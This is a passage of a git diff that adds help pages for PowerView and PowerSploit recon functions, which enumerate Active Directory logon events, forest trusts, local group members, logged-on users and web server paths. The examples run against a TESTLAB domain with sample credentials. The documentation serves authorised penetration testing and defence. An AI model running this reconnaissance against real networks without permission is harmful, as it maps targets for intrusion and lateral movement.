+Accept wildcard characters: False
+```
+
+### -ResultPageSize
+Specifies the PageSize to set for the LDAP searcher object.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 200
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ServerTimeLimit
+Specifies the maximum amount of time the server spends searching.
+Default of 120 seconds.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 0
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -SecurityMasks
+Specifies an option for examining security information of a directory object.
+One of 'Dacl', 'Group', 'None', 'Owner', 'Sacl'.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Tombstone
+Switch.
+Specifies that the searcher should also return deleted/tombstoned objects.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -FindOne
+Only return one result object.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases: ReturnOne
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Credential
+A \[Management.Automation.PSCredential\] object of alternate credentials
+for connection to the target domain.
+
+```yaml
+Type: PSCredential
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: [Management.Automation.PSCredential]::Empty
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Raw
+Switch.
+Return raw results instead of translating the fields into a custom PSObject.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+### String
+
+## OUTPUTS
+
+### PowerView.User
+
+Custom PSObject with translated user property fields.
+
+PowerView.User.Raw
+
+The raw DirectoryServices.SearchResult object, if -Raw is enabled.
+
+## NOTES
+
+## RELATED LINKS
+
diff --git a/docs/Recon/Get-DomainUserEvent.md b/docs/Recon/Get-DomainUserEvent.md
new file mode 100755
index 0000000..c844981
--- /dev/null
+++ b/docs/Recon/Get-DomainUserEvent.md
@@ -0,0 +1,144 @@
+# Get-DomainUserEvent
+
+## SYNOPSIS
+Enumerate account logon events (ID 4624) and Logon with explicit credential
+events (ID 4648) from the specified host (default of the localhost).
+
+Author: Lee Christensen (@tifkin_), Justin Warner (@sixdub), Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: None
+
+## SYNTAX
+
+```
+Get-DomainUserEvent [[-ComputerName] <String[]>] [-StartTime <DateTime>] [-EndTime <DateTime>]
+ [-MaxEvents <Int32>] [-Credential <PSCredential>]
+```
+
+## DESCRIPTION
+This function uses an XML path filter passed to Get-WinEvent to retrieve
+security events with IDs of 4624 (logon events) or 4648 (explicit credential
+logon events) from -StartTime (default of now-1 day) to -EndTime (default of now).
+A maximum of -MaxEvents (default of 5000) are returned.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Get-DomainUserEvent
+```
+
+Return logon events on the local machine.
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+Get-DomainController | Get-DomainUserEvent -StartTime ([DateTime]::Now.AddDays(-3))
+```
+
+Return all logon events from the last 3 days from every domain controller in the current domain.
+
+### -------------------------- EXAMPLE 3 --------------------------
+```
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+```
+
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Get-DomainUserEvent -ComputerName PRIMARY.testlab.local -Credential $Cred -MaxEvents 1000
+
+Return a max of 1000 logon events from the specified machine using the specified alternate credentials.
+
+## PARAMETERS
+
+### -ComputerName
+Specifies the computer name to retrieve events from, default of localhost.
+
+```yaml
+Type: String[]
+Parameter Sets: (All)
+Aliases: dnshostname, HostName, name
+
+Required: False
+Position: 1
+Default value: $Env:COMPUTERNAME
+Accept pipeline input: True (ByPropertyName, ByValue)
+Accept wildcard characters: False
+```
+
+### -StartTime
+The \[DateTime\] object representing the start of when to collect events.
+Default of \[DateTime\]::Now.AddDays(-1).
+
+```yaml
+Type: DateTime
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: [DateTime]::Now.AddDays(-1)
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -EndTime
+The \[DateTime\] object representing the end of when to collect events.
+Default of \[DateTime\]::Now.
+
+```yaml
+Type: DateTime
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: [DateTime]::Now
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -MaxEvents
+The maximum number of events to retrieve.
+Default of 5000.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 5000
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Credential
+A \[Management.Automation.PSCredential\] object of alternate credentials
+for connection to the target computer.
+
+```yaml
+Type: PSCredential
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: [Management.Automation.PSCredential]::Empty
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+### PowerView.LogonEvent
+
+PowerView.ExplicitCredentialLogonEvent
+
+## NOTES
+
+## RELATED LINKS
+
+[http://www.sixdub.net/2014/11/07/offensive-event-parsing-bringing-home-trophies/](http://www.sixdub.net/2014/11/07/offensive-event-parsing-bringing-home-trophies/)
+
diff --git a/docs/Recon/Get-Forest.md b/docs/Recon/Get-Forest.md
new file mode 100755
index 0000000..51ddef6
--- /dev/null
+++ b/docs/Recon/Get-Forest.md
@@ -0,0 +1,80 @@
+# Get-Forest
+
+## SYNOPSIS
+Returns the forest object for the current (or specified) forest.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: ConvertTo-SID
+
+## SYNTAX
+
+```
+Get-Forest [[-Forest] <String>] [-Credential <PSCredential>]
+```
+
+## DESCRIPTION
+Returns a System.DirectoryServices.ActiveDirectory.Forest object for the current
+forest or the forest specified with -Forest X.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Get-Forest -Forest external.domain
+```
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+```
+
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Get-Forest -Credential $Cred
+
+## PARAMETERS
+
+### -Forest
+The forest name to query for, defaults to the current forest.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: 1
+Default value: None
+Accept pipeline input: True (ByValue)
+Accept wildcard characters: False
+```
+
+### -Credential
+A \[Management.Automation.PSCredential\] object of alternate credentials
+for connection to the target forest.
+
+```yaml
+Type: PSCredential
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: [Management.Automation.PSCredential]::Empty
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+### System.Management.Automation.PSCustomObject
+
+Outputs a PSObject containing System.DirectoryServices.ActiveDirectory.Forest in addition
+to the forest root domain SID.
+
+## NOTES
+
+## RELATED LINKS
+
diff --git a/docs/Recon/Get-ForestDomain.md b/docs/Recon/Get-ForestDomain.md
new file mode 100755
index 0000000..d755c0c
--- /dev/null
+++ b/docs/Recon/Get-ForestDomain.md
@@ -0,0 +1,82 @@
+# Get-ForestDomain
+
+## SYNOPSIS
+Return all domains for the current (or specified) forest.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: Get-Forest
+
+## SYNTAX
+
+```
+Get-ForestDomain [[-Forest] <String>] [-Credential <PSCredential>]
+```
+
+## DESCRIPTION
+Returns all domains for the current forest or the forest specified
+by -Forest X.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Get-ForestDomain
+```
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+Get-ForestDomain -Forest external.local
+```
+
+### -------------------------- EXAMPLE 3 --------------------------
+```
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+```
+
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Get-ForestDomain -Credential $Cred
+
+## PARAMETERS
+
+### -Forest
+Specifies the forest name to query for domains.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: 1
+Default value: None
+Accept pipeline input: True (ByValue)
+Accept wildcard characters: False
+```
+
+### -Credential
+A \[Management.Automation.PSCredential\] object of alternate credentials
+for connection to the target forest.
+
+```yaml
+Type: PSCredential
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: [Management.Automation.PSCredential]::Empty
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+### System.DirectoryServices.ActiveDirectory.Domain
+
+## NOTES
+
+## RELATED LINKS
+
diff --git a/docs/Recon/Get-ForestGlobalCatalog.md b/docs/Recon/Get-ForestGlobalCatalog.md
new file mode 100755
index 0000000..c6da4bd
--- /dev/null
+++ b/docs/Recon/Get-ForestGlobalCatalog.md
@@ -0,0 +1,78 @@
+# Get-ForestGlobalCatalog
+
+## SYNOPSIS
+Return all global catalogs for the current (or specified) forest.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: Get-Forest
+
+## SYNTAX
+
+```
+Get-ForestGlobalCatalog [[-Forest] <String>] [-Credential <PSCredential>]
+```
+
+## DESCRIPTION
+Returns all global catalogs for the current forest or the forest specified
+by -Forest X by using Get-Forest to retrieve the specified forest object
+and the .FindAllGlobalCatalogs() to enumerate the global catalogs.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Get-ForestGlobalCatalog
+```
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+```
+
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Get-ForestGlobalCatalog -Credential $Cred
+
+## PARAMETERS
+
+### -Forest
+Specifies the forest name to query for global catalogs.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: 1
+Default value: None
+Accept pipeline input: True (ByValue)
+Accept wildcard characters: False
+```
+
+### -Credential
+A \[Management.Automation.PSCredential\] object of alternate credentials
+for connection to the target domain.
+
+```yaml
+Type: PSCredential
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: [Management.Automation.PSCredential]::Empty
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+### System.DirectoryServices.ActiveDirectory.GlobalCatalog
+
+## NOTES
+
+## RELATED LINKS
+
diff --git a/docs/Recon/Get-ForestTrust.md b/docs/Recon/Get-ForestTrust.md
new file mode 100755
index 0000000..0ff5e3d
--- /dev/null
+++ b/docs/Recon/Get-ForestTrust.md
@@ -0,0 +1,91 @@
+# Get-ForestTrust
+
+## SYNOPSIS
+Return all forest trusts for the current forest or a specified forest.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: Get-Forest
+
+## SYNTAX
+
+```
+Get-ForestTrust [[-Forest] <String>] [-Credential <PSCredential>]
+```
+
+## DESCRIPTION
+This function will enumerate domain trust relationships for the current (or a remote)
+forest using number of method using the .NET method GetAllTrustRelationships() on a
+System.DirectoryServices.ActiveDirectory.Forest returned by Get-Forest.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Get-ForestTrust
+```
+
+Return current forest trusts.
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+Get-ForestTrust -Forest "external.local"
+```
+
+Return trusts for the "external.local" forest.
+
+### -------------------------- EXAMPLE 3 --------------------------
+```
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+```
+
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Get-ForestTrust -Forest "external.local" -Credential $Cred
+
+Return trusts for the "external.local" forest using the specified alternate credenitals.
+
+## PARAMETERS
+
+### -Forest
+Specifies the forest to query for trusts, defaults to the current forest.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: Name
+
+Required: False
+Position: 1
+Default value: None
+Accept pipeline input: True (ByPropertyName, ByValue)
+Accept wildcard characters: False
+```
+
+### -Credential
+A \[Management.Automation.PSCredential\] object of alternate credentials
+for connection to the target domain.
+
+```yaml
+Type: PSCredential
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: [Management.Automation.PSCredential]::Empty
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+### PowerView.DomainTrust.NET
+
+A TrustRelationshipInformationCollection returned when using .NET methods (default).
+
+## NOTES
+
+## RELATED LINKS
+
diff --git a/docs/Recon/Get-HttpStatus.md b/docs/Recon/Get-HttpStatus.md
new file mode 100755
index 0000000..a8a7dbb
--- /dev/null
+++ b/docs/Recon/Get-HttpStatus.md
@@ -0,0 +1,106 @@
+# Get-HttpStatus
+
+## SYNOPSIS
+Returns the HTTP Status Codes and full URL for specified paths.
+
+PowerSploit Function: Get-HttpStatus
+Author: Chris Campbell (@obscuresec)
+License: BSD 3-Clause
+Required Dependencies: None
+Optional Dependencies: None
+
+## SYNTAX
+
+```
+Get-HttpStatus [-Target] <String> [[-Path] <String>] [[-Port] <Int32>] [-UseSSL]
+```
+
+## DESCRIPTION
+A script to check for the existence of a path or file on a webserver.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Get-HttpStatus -Target www.example.com -Path c:\dictionary.txt | Select-Object {where StatusCode -eq 20*}
+```
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+Get-HttpStatus -Target www.example.com -Path c:\dictionary.txt -UseSSL
+```
+
+## PARAMETERS
+
+### -Target
+Specifies the remote web host either by IP or hostname.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: True
+Position: 1
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Path
+Specifies the remost host.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: 2
+Default value: .\Dictionaries\admin.txt
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Port
+Specifies the port to connect to.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: 3
+Default value: 0
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -UseSSL
+Use an SSL connection.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+## NOTES
+HTTP Status Codes: 100 - Informational * 200 - Success * 300 - Redirection * 400 - Client Error * 500 - Server Error
+
+## RELATED LINKS
+
+[http://obscuresecurity.blogspot.com
+http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html]()
+
diff --git a/docs/Recon/Get-NetComputerSiteName.md b/docs/Recon/Get-NetComputerSiteName.md
new file mode 100755
index 0000000..1a3a964
--- /dev/null
+++ b/docs/Recon/Get-NetComputerSiteName.md
@@ -0,0 +1,89 @@
+# Get-NetComputerSiteName
+
+## SYNOPSIS
+Returns the AD site where the local (or a remote) machine resides.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: PSReflect, Invoke-UserImpersonation, Invoke-RevertToSelf
+
+## SYNTAX
+
+```
+Get-NetComputerSiteName [[-ComputerName] <String[]>] [-Credential <PSCredential>]
+```
+
+## DESCRIPTION
+This function will use the DsGetSiteName Win32API call to look up the
+name of the site where a specified computer resides.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Get-NetComputerSiteName -ComputerName WINDOWS1.testlab.local
+```
+
+Returns the site for WINDOWS1.testlab.local.
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+Get-DomainComputer | Get-NetComputerSiteName
+```
+
+Returns the sites for every machine in AD.
+
+### -------------------------- EXAMPLE 3 --------------------------
+```
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+```
+
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Get-NetComputerSiteName -ComputerName WINDOWS1.testlab.local -Credential $Cred
+
+## PARAMETERS
+
+### -ComputerName
+Specifies the hostname to check the site for (also accepts IP addresses).
+Defaults to 'localhost'.
+
+```yaml
+Type: String[]
+Parameter Sets: (All)
+Aliases: HostName, dnshostname, name
+
+Required: False
+Position: 1
+Default value: Localhost
+Accept pipeline input: True (ByPropertyName, ByValue)
+Accept wildcard characters: False
+```
+
+### -Credential
+A \[Management.Automation.PSCredential\] object of alternate credentials
+for connection to the remote system using Invoke-UserImpersonation.
+
+```yaml
+Type: PSCredential
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: [Management.Automation.PSCredential]::Empty
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+### PowerView.ComputerSite
+
+A PSCustomObject containing the ComputerName, IPAddress, and associated Site name.
+
+## NOTES
+
+## RELATED LINKS
+
diff --git a/docs/Recon/Get-NetLocalGroup.md b/docs/Recon/Get-NetLocalGroup.md
new file mode 100755
index 0000000..29ac4d6
--- /dev/null
+++ b/docs/Recon/Get-NetLocalGroup.md
@@ -0,0 +1,132 @@
+# Get-NetLocalGroup
+
+## SYNOPSIS
+Enumerates the local groups on the local (or remote) machine.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: PSReflect
+
+## SYNTAX
+
+```
+Get-NetLocalGroup [[-ComputerName] <String[]>] [-Method <String>] [-Credential <PSCredential>]
+```
+
+## DESCRIPTION
+This function will enumerate the names and descriptions for the
+local groups on the current, or remote, machine.
+By default, the Win32 API
+call NetLocalGroupEnum will be used (for speed).
+Specifying "-Method WinNT"
+causes the WinNT service provider to be used instead, which returns group
+SIDs along with the group names and descriptions/comments.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Get-NetLocalGroup
+```
+
+ComputerName GroupName Comment
+------------ --------- -------
+WINDOWS1 Administrators Administrators have comple...
+WINDOWS1 Backup Operators Backup Operators can overr...
+WINDOWS1 Cryptographic Operators Members are authorized to ...
+...
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+Get-NetLocalGroup -Method Winnt
+```
+
+ComputerName GroupName GroupSID Comment
+------------ --------- -------- -------
+WINDOWS1 Administrators S-1-5-32-544 Administrators hav...
+WINDOWS1 Backup Operators S-1-5-32-551 Backup Operators c...
+WINDOWS1 Cryptographic Opera...
+S-1-5-32-569 Members are author...
+...
+
+### -------------------------- EXAMPLE 3 --------------------------
+```
+Get-NetLocalGroup -ComputerName primary.testlab.local
+```
+
+ComputerName GroupName Comment
+------------ --------- -------
+primary.testlab.local Administrators Administrators have comple...
+primary.testlab.local Users Users are prevented from m...
+primary.testlab.local Guests Guests have the same acces...
+primary.testlab.local Print Operators Members can administer dom...
+primary.testlab.local Backup Operators Backup Operators can overr...
+
+## PARAMETERS
+
+### -ComputerName
+Specifies the hostname to query for sessions (also accepts IP addresses).
+Defaults to the localhost.
+
+```yaml
+Type: String[]
+Parameter Sets: (All)
+Aliases: HostName, dnshostname, name
+
+Required: False
+Position: 1
+Default value: $Env:COMPUTERNAME
+Accept pipeline input: True (ByPropertyName, ByValue)
+Accept wildcard characters: False
+```
+
+### -Method
+The collection method to use, defaults to 'API', also accepts 'WinNT'.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: CollectionMethod
+
+Required: False
+Position: Named
+Default value: API
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Credential
+A \[Management.Automation.PSCredential\] object of alternate credentials
+for connection to a remote machine.
+Only applicable with "-Method WinNT".
+
+```yaml
+Type: PSCredential
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: [Management.Automation.PSCredential]::Empty
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+### PowerView.LocalGroup.API
+
+Custom PSObject with translated group property fields from API results.
+
+PowerView.LocalGroup.WinNT
+
+Custom PSObject with translated group property fields from WinNT results.
+
+## NOTES
+
+## RELATED LINKS
+
+[https://msdn.microsoft.com/en-us/library/windows/desktop/aa370440(v=vs.85).aspx](https://msdn.microsoft.com/en-us/library/windows/desktop/aa370440(v=vs.85).aspx)
+
diff --git a/docs/Recon/Get-NetLocalGroupMember.md b/docs/Recon/Get-NetLocalGroupMember.md
new file mode 100755
index 0000000..302302b
--- /dev/null
+++ b/docs/Recon/Get-NetLocalGroupMember.md
@@ -0,0 +1,212 @@
+# Get-NetLocalGroupMember
+
+## SYNOPSIS
+Enumerates members of a specific local group on the local (or remote) machine.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: PSReflect, Convert-ADName
+
+## SYNTAX
+
+```
+Get-NetLocalGroupMember [[-ComputerName] <String[]>] [-GroupName <String>] [-Method <String>]
+ [-Credential <PSCredential>]
+```
+
+## DESCRIPTION
+This function will enumerate the members of a specified local group on the
+current, or remote, machine.
+By default, the Win32 API call NetLocalGroupGetMembers
+will be used (for speed).
+Specifying "-Method WinNT" causes the WinNT service provider
+to be used instead, which returns a larger amount of information.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Get-NetLocalGroupMember | ft
+```
+
+ComputerName GroupName MemberName SID IsGroup IsDomain
+------------ --------- ---------- --- ------- --------
+WINDOWS1 Administrators WINDOWS1\Ad...
+S-1-5-21-25...
+False False
+WINDOWS1 Administrators WINDOWS1\lo...
+S-1-5-21-25...
+False False
+WINDOWS1 Administrators TESTLAB\Dom...
+S-1-5-21-89...
+True True
+WINDOWS1 Administrators TESTLAB\har...
+S-1-5-21-89...
+False True
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+Get-NetLocalGroupMember -Method winnt | ft
+```
+
+ComputerName GroupName MemberName SID IsGroup IsDomain
+------------ --------- ---------- --- ------- --------
+WINDOWS1 Administrators WINDOWS1\Ad...
+S-1-5-21-25...
+False False
+WINDOWS1 Administrators WINDOWS1\lo...
+S-1-5-21-25...
+False False
+WINDOWS1 Administrators TESTLAB\Dom...
+S-1-5-21-89...
+True True
+WINDOWS1 Administrators TESTLAB\har...
+S-1-5-21-89...
+False True
+
+### -------------------------- EXAMPLE 3 --------------------------
+```
+Get-NetLocalGroup | Get-NetLocalGroupMember | ft
+```
+
+ComputerName GroupName MemberName SID IsGroup IsDomain
+------------ --------- ---------- --- ------- --------
+WINDOWS1 Administrators WINDOWS1\Ad...
+S-1-5-21-25...
+False False
+WINDOWS1 Administrators WINDOWS1\lo...
+S-1-5-21-25...
+False False
+WINDOWS1 Administrators TESTLAB\Dom...
+S-1-5-21-89...
+True True
+WINDOWS1 Administrators TESTLAB\har...
+S-1-5-21-89...
+False True
+WINDOWS1 Guests WINDOWS1\Guest S-1-5-21-25...
+False False
+WINDOWS1 IIS_IUSRS NT AUTHORIT...
+S-1-5-17 False False
+WINDOWS1 Users NT AUTHORIT...
+S-1-5-4 False False
+WINDOWS1 Users NT AUTHORIT...
+S-1-5-11 False False
+WINDOWS1 Users WINDOWS1\lo...
+S-1-5-21-25...
+False UNKNOWN
+WINDOWS1 Users TESTLAB\Dom...
+S-1-5-21-89...
+True UNKNOWN
+
+### -------------------------- EXAMPLE 4 --------------------------
+```
+Get-NetLocalGroupMember -ComputerName primary.testlab.local | ft
+```
+
+ComputerName GroupName MemberName SID IsGroup IsDomain
+------------ --------- ---------- --- ------- --------
+primary.tes...
+Administrators TESTLAB\Adm...
+S-1-5-21-89...
+False False
+primary.tes...
+Administrators TESTLAB\loc...
+S-1-5-21-89...
+False False
+primary.tes...
+Administrators TESTLAB\Ent...
+S-1-5-21-89...
+True False
+primary.tes...
+Administrators TESTLAB\Dom...
+S-1-5-21-89...
+True False
+
+## PARAMETERS
+
+### -ComputerName
+Specifies the hostname to query for sessions (also accepts IP addresses).
+Defaults to the localhost.
+
+```yaml
+Type: String[]
+Parameter Sets: (All)
+Aliases: HostName, dnshostname, name
+
+Required: False
+Position: 1
+Default value: $Env:COMPUTERNAME
+Accept pipeline input: True (ByPropertyName, ByValue)
+Accept wildcard characters: False
+```
+
+### -GroupName
+The local group name to query for users.
+If not given, it defaults to "Administrators".
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: Administrators
+Accept pipeline input: True (ByPropertyName)
+Accept wildcard characters: False
+```
+
+### -Method
+The collection method to use, defaults to 'API', also accepts 'WinNT'.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: CollectionMethod
+
+Required: False
+Position: Named
+Default value: API
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Credential
+A \[Management.Automation.PSCredential\] object of alternate credentials
+for connection to a remote machine.
+Only applicable with "-Method WinNT".
+
+```yaml
+Type: PSCredential
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: [Management.Automation.PSCredential]::Empty
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+### PowerView.LocalGroupMember.API
+
+Custom PSObject with translated group property fields from API results.
+
+PowerView.LocalGroupMember.WinNT
+
+Custom PSObject with translated group property fields from WinNT results.
+
+## NOTES
+
+## RELATED LINKS
+
+[http://stackoverflow.com/questions/21288220/get-all-local-members-and-groups-displayed-together
+http://msdn.microsoft.com/en-us/library/aa772211(VS.85).aspx
+https://msdn.microsoft.com/en-us/library/windows/desktop/aa370601(v=vs.85).aspx](http://stackoverflow.com/questions/21288220/get-all-local-members-and-groups-displayed-together
+http://msdn.microsoft.com/en-us/library/aa772211(VS.85).aspx
+https://msdn.microsoft.com/en-us/library/windows/desktop/aa370601(v=vs.85).aspx)
+
diff --git a/docs/Recon/Get-NetLoggedon.md b/docs/Recon/Get-NetLoggedon.md
new file mode 100755
index 0000000..024d1b2
--- /dev/null
+++ b/docs/Recon/Get-NetLoggedon.md
@@ -0,0 +1,100 @@
+# Get-NetLoggedon
+
+## SYNOPSIS
+Returns users logged on the local (or a remote) machine.
+Note: administrative rights needed for newer Windows OSes.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: PSReflect, Invoke-UserImpersonation, Invoke-RevertToSelf
+
+## SYNTAX
+
+```
+Get-NetLoggedon [[-ComputerName] <String[]>] [-Credential <PSCredential>]
+```
+
+## DESCRIPTION
+This function will execute the NetWkstaUserEnum Win32API call to query
+a given host for actively logged on users.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Get-NetLoggedon
+```
+
+Returns users actively logged onto the local host.
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+Get-NetLoggedon -ComputerName sqlserver
+```
+
+Returns users actively logged onto the 'sqlserver' host.
+
+### -------------------------- EXAMPLE 3 --------------------------
+```
+Get-DomainComputer | Get-NetLoggedon
+```
+
+Returns all logged on users for all computers in the domain.
+
+### -------------------------- EXAMPLE 4 --------------------------
+```
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+```
+
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Get-NetLoggedon -ComputerName sqlserver -Credential $Cred
+
+## PARAMETERS
+
+### -ComputerName
+Specifies the hostname to query for logged on users (also accepts IP addresses).
+Defaults to 'localhost'.
+
+```yaml
+Type: String[]
+Parameter Sets: (All)
+Aliases: HostName, dnshostname, name
+
+Required: False
+Position: 1
+Default value: Localhost
+Accept pipeline input: True (ByPropertyName, ByValue)
+Accept wildcard characters: False
+```
+
+### -Credential
+A \[Management.Automation.PSCredential\] object of alternate credentials
+for connection to the remote system using Invoke-UserImpersonation.
+
+```yaml
+Type: PSCredential
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: [Management.Automation.PSCredential]::Empty
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+### PowerView.LoggedOnUserInfo
+
+A PSCustomObject representing a WKSTA_USER_INFO_1 structure, including
+the UserName/LogonDomain/AuthDomains/LogonServer for each user, with the ComputerName added.
+
+## NOTES
+
+## RELATED LINKS
+
+[http://www.powershellmagazine.com/2014/09/25/easily-defining-enums-structs-and-win32-functions-in-memory/](http://www.powershellmagazine.com/2014/09/25/easily-defining-enums-structs-and-win32-functions-in-memory/)
+
diff --git a/docs/Recon/Get-NetRDPSession.md b/docs/Recon/Get-NetRDPSession.md
new file mode 100755
index 0000000..ff18322
--- /dev/null
+++ b/docs/Recon/Get-NetRDPSession.md
@@ -0,0 +1,104 @@
+# Get-NetRDPSession
+
+## SYNOPSIS
+Returns remote desktop/session information for the local (or a remote) machine.
+
+Note: only members of the Administrators or Account Operators local group
+can successfully execute this functionality on a remote target.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
